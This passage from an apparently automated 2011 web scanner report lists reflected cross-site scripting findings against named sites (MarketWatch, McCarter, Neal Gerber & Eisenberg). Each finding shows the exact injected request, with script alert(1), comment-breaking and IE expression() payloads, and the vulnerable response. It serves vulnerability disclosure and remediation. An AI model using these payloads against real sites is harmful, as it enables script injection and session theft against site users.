Content-Length: 16792
Content-Type: text/html
Expires: Wed, 11 May 2011 17:02:26 GMT
Set-Cookie: ASPSESSIONIDACRSARSQ=NDIOPPGAEEJNPIBMFJKNCIBF; path=/
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 -->
...[SNIP]...

5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820c9'%3b341cec042cb was submitted in the REST URL parameter 1. This input was echoed as 820c9';341cec042cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news820c9'%3b341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp03
Date: Thu, 12 May 2011 16:55:36 GMT
Content-Length: 47979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news820c9';341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf15'%3b1be7beea177 was submitted in the REST URL parameter 2. This input was echoed as 4bf15';1be7beea177 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story4bf15'%3b1be7beea177/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp05
Date: Thu, 12 May 2011 16:55:38 GMT
Content-Length: 47962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story4bf15';1be7beea177/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27255'%3b1bfa3236508 was submitted in the REST URL parameter 3. This input was echoed as 27255';1bfa3236508 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story/therese-polettis-tech-tales-ebay27255'%3b1bfa3236508/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-MACHINE: sbkdfpswebp05
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:39 GMT
Content-Length: 47989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story/therese-polettis-tech-tales-ebay27255';1bfa3236508/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c236--><script>alert(1)</script>ec7143486da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uzkyef2x3acjgpfcgsg5xca2; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
intImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into an HTML comment. The payload db0cb-->fb4f1fe73a0 was submitted in the searchlink parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43785


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
ouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba was submitted in the searchlink parameter. This input was echoed as fb9d9"style="x:expr/**/ession(alert(1))"514872699ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<IFRAME style=" bgcolor:#969696;height:530px;width:450px;margin-top:4px;overflow-x: hidden;z-index:1;left:0px" src="fb9d9"style="x:expr/**/ession(alert(1))"514872699ba.aspx" frameborder=0 name="overview" style="FILTER: chroma (color=00FF80)">
...[SNIP]...

5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 was submitted in the searchlink parameter. This input was echoed as 59747"style="x:expr/**/ession(alert(1))"9b4792d76c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=searchnew59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
t" id="printImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('searchnew59747"style="x:expr/**/ession(alert(1))"9b4792d76c9.aspx?PrintPage=True&mode=&sortby=','PrintPage','scrollbars=yes,menubar=yes,width=700,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /about/honors_awards.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81f7"><script>alert(1)</script>4d4e89dfd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1 HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:15 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24237


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Honors & Awards</TITLE>
   </HEAD>
   <meta name="description" content=" Neal, Gerber & Eisenberg LLP is committed to excellence in both client
...[SNIP]...
<a href="http://www.ngelaw.com/about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1&print=true" target=_blank>
...[SNIP]...

5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/attorney.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc93"><script>alert(1)</script>9db17f76a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/event_detail.aspx?ID=688
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:25 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18042


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys
            | Search
       </TITLE>
   </HEAD>
   
   <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="java
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1&print=true" target=_blank>
...[SNIP]...

5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/bio.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7e8"><script>alert(1)</script>6f7768e8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/results.aspx?letter=M
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:56:04 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11687


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys | Hillary A. Mann</TITLE>
   </HEAD>
   <meta name="description" content="Hillary A. Mann Hillary A. Mann is a member of Neal Gerber
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1&print=true" target=_blank>
...[SNIP]...

5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/results.aspx

Issue detail

The value of the letter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 was submitted in the letter parameter. This input was echoed as 373ca"style="x:expr/**/ession(alert(1))"25abb64fc21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /attorney/results.aspx?letter=M373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/attorney.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:55 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9896


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Attorneys | Attorney Search Results</title>
       
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="jav
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/results.aspx?letter=M373ca"style="x:expr/**/ession(alert(1))"25abb64fc21&print=true" target=_blank>
...[SNIP]...

5.32. http://www.ngelaw.com/att